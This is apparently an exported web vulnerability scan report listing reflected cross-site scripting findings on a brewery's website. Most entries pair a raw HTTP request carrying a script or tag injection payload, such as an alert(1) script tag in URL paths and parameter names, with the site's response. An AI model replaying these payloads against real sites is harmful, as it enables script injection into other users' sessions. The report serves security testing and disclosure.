HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:32 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17c1c"><a>a8cde8ac9b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contact17c1c"><a>a8cde8ac9b3/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:59 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb4b5"><script>alert(1)</script>1a875df3c26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/contentcb4b5"><script>alert(1)</script>1a875df3c26/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:24 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14666
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3d1"><script>alert(1)</script>ecfeb04c9eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/jsbc3d1"><script>alert(1)</script>ecfeb04c9eb/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:25 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14666
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d476b"><script>alert(1)</script>a689b0522a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/js/combined.cssd476b"><script>alert(1)</script>a689b0522a2 HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:26 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14666
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
1.208. http://www.ninkasibrewing.com/contact/content/js/combined.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ninkasibrewing.com
Path:
/contact/content/js/combined.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71815"><script>alert(1)</script>1eba9a79caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/js/combined.css?71815"><script>alert(1)</script>1eba9a79caa=1 HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb5da"><a>6d080ef4815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contactbb5da"><a>6d080ef4815/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:02 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7350e"><script>alert(1)</script>c3cd6c52bb9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content7350e"><script>alert(1)</script>c3cd6c52bb9/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:27 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e7c2"><script>alert(1)</script>abe7c99ab4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/js4e7c2"><script>alert(1)</script>abe7c99ab4e/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:29 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20af2"><script>alert(1)</script>da4e655317a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/js/combined.js20af2"><script>alert(1)</script>da4e655317a HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
1.213. http://www.ninkasibrewing.com/contact/content/js/combined.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ninkasibrewing.com
Path:
/contact/content/js/combined.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dfc"><script>alert(1)</script>1139d382123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/js/combined.js?68dfc"><script>alert(1)</script>1139d382123=1 HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:34 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14668
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b52"><a>dca3b514689 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contenta4b52"><a>dca3b514689/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:36 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb5f9"><a>6ec3d9ffd59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentbb5f9"><a>6ec3d9ffd59/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:12 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f696"><a>14eab4f7f64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content6f696"><a>14eab4f7f64/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:17 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a612"><a>155fb3b9f51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content3a612"><a>155fb3b9f51/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:13 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edf9b"><a>e851ee84c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentedf9b"><a>e851ee84c8f/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f19e"><a>5dbf816ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content6f19e"><a>5dbf816ffe/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1074f"><a>3bd48f0635 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content1074f"><a>3bd48f0635/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:19 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f27"><a>d2ed1bcbe0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content39f27"><a>d2ed1bcbe0a/css/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:38 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de265"><a>99351a372e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentde265"><a>99351a372e/css/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:23 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84a9"><a>f8f239e2cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contenta84a9"><a>f8f239e2cf0/css/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6505"><a>a690865482b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentd6505"><a>a690865482b/css/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db76d"><a>d3d2af91b6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentdb76d"><a>d3d2af91b6b/css/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e8c"><a>4b2c3c0e6c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contentb1e8c"><a>4b2c3c0e6c7/css/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:51:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f196b"><a>845524f273a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
